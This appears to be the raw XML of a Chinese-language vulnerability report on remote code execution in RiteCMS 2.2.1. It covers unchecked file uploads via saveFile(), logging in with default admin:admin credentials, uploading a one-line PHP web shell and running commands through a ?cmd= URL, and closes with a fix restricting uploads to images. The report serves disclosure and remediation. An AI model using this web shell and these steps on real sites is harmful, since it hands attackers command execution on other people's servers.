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167723ED" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="00E676F1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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E676F1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RiteCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E676F1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 xml:space="preserve"> 2.2.1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远程代码执行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046A0D0F" w:rsidR="004D158C" w:rsidRDefault="00A30034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4625AA" wp14:editId="49133352">
            <wp:extent cx="5274310" cy="3286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B091" w14:textId="1698B338" w:rsidR="00E220C3" w:rsidRPr="004D158C" w:rsidRDefault="00E220C3" w:rsidP="006B645E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键代码如图：</w:t>
      </w:r>
      <w:r w:rsidR="00A56EF3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>对于post的文件判断是否需要裁剪等等处理，如果都不是执行7</w:t>
      </w:r>
      <w:r w:rsidR="00A56EF3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A56EF3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>行的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A56EF3" w:rsidRPr="00A56EF3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>saveFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A56EF3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>（）函数保存文件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3AAEBB8F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E676F1" w:rsidRPr="00E676F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>远程代码执行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50A76199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0F0F1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2.2.1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lastRenderedPageBreak/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F96866E" w14:textId="77777777" w:rsidR="007059D9" w:rsidRPr="006C449D" w:rsidRDefault="007059D9" w:rsidP="007059D9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1-转到以下网址。&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006C449D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http://(HOST)/cms/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB02477" w14:textId="77777777" w:rsidR="007059D9" w:rsidRPr="006C449D" w:rsidRDefault="007059D9" w:rsidP="007059D9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-默认用户名和密码为管理员：管理员。我们必须知道登录凭据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C73E8D6" w14:textId="406D5BEB" w:rsidR="007059D9" w:rsidRPr="006C449D" w:rsidRDefault="007059D9" w:rsidP="007059D9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3-转到“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00023D69" w:rsidRPr="00023D6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Filemanager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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”并按“</w:t>
      </w:r>
      <w:r w:rsidR="00023D69" w:rsidRPr="00023D6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Upload file</w:t>
      </w:r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”按钮。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B81A1B" w14:textId="77777777" w:rsidR="007059D9" w:rsidRPr="006C449D" w:rsidRDefault="007059D9" w:rsidP="007059D9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4-选择你的php网页外壳脚本并上传。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE58C6" w14:textId="77777777" w:rsidR="007059D9" w:rsidRPr="006C449D" w:rsidRDefault="007059D9" w:rsidP="007059D9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HP Web Shell代码==</w:t>
      </w:r>
      <w:r w:rsidRPr="005E64B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&lt;?php system($_GET['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E64B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cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E64B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']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11306B0A" w14:textId="77777777" w:rsidR="007059D9" w:rsidRDefault="007059D9" w:rsidP="007059D9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5-你可以在那里找到上传的文件。&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0021666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09872093" w14:textId="77777777" w:rsidR="007059D9" w:rsidRDefault="007059D9" w:rsidP="007059D9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5A05E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http://(HOST)/media/(FILE-NAME).php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF954E3" w14:textId="77777777" w:rsidR="007059D9" w:rsidRDefault="007059D9" w:rsidP="007059D9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6-</w:t>
      </w:r>
      <w:r w:rsidRPr="006C449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我们现在可以执行命令了。&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B959E6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3B3A45C2" w14:textId="77777777" w:rsidR="007059D9" w:rsidRPr="00B959E6" w:rsidRDefault="007059D9" w:rsidP="007059D9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241B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http://(HOST)/media/(FILE-NAME).php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27B7FD" w14:textId="574B5CCF" w:rsidR="000F53EF" w:rsidRPr="007059D9" w:rsidRDefault="005B043B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451A3" wp14:editId="711CE2BA">
            <wp:extent cx="5274310" cy="4175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9267" w14:textId="37DC4482" w:rsidR="007059D9" w:rsidRDefault="00D45121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D98F80" wp14:editId="214DF940">
            <wp:extent cx="5274310" cy="4182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0639" w14:textId="0C98F6B5" w:rsidR="00547058" w:rsidRPr="000F53EF" w:rsidRDefault="00547058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D4010" wp14:editId="3FCF9C80">
            <wp:extent cx="5162550" cy="1190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2F8ED82B" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="00867A80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 w:rsidRPr="00867A80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>对文件类型和文件名称等做限制，仅允许上传</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00867A80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00867A80">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>、jpg等图片文件。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9C4B9" w14:textId="77777777" w:rsidR="00115C02" w:rsidRDefault="00115C02" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2623BE63" w14:textId="77777777" w:rsidR="00115C02" w:rsidRDefault="00115C02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5BDD" w14:textId="77777777" w:rsidR="00115C02" w:rsidRDefault="00115C02" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="11DB6354" w14:textId="77777777" w:rsidR="00115C02" w:rsidRDefault="00115C02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3D69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0F1C"/>
    <w:rsid w:val="000F1722"/>
    <w:rsid w:val="000F38D7"/>
    <w:rsid w:val="000F53EF"/>
    <w:rsid w:val="000F7BE0"/>
    <w:rsid w:val="0010293E"/>
    <w:rsid w:val="00115C02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16663"/>
    <w:rsid w:val="0022700D"/>
    <w:rsid w:val="0023642A"/>
    <w:rsid w:val="00241B01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058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05E9"/>
    <w:rsid w:val="005A68F3"/>
    <w:rsid w:val="005B043B"/>
    <w:rsid w:val="005B677A"/>
    <w:rsid w:val="005C0D13"/>
    <w:rsid w:val="005D79E7"/>
    <w:rsid w:val="005E0340"/>
    <w:rsid w:val="005E64B3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C449D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059D9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67A80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034"/>
    <w:rsid w:val="00A30126"/>
    <w:rsid w:val="00A30EB7"/>
    <w:rsid w:val="00A336CE"/>
    <w:rsid w:val="00A353B0"/>
    <w:rsid w:val="00A47E23"/>
    <w:rsid w:val="00A5090E"/>
    <w:rsid w:val="00A550B6"/>
    <w:rsid w:val="00A56EF3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1BEC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45121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220C3"/>
    <w:rsid w:val="00E338DD"/>
    <w:rsid w:val="00E37157"/>
    <w:rsid w:val="00E44AEC"/>
    <w:rsid w:val="00E453C6"/>
    <w:rsid w:val="00E46233"/>
    <w:rsid w:val="00E63E6A"/>
    <w:rsid w:val="00E676F1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64</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-30T03:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08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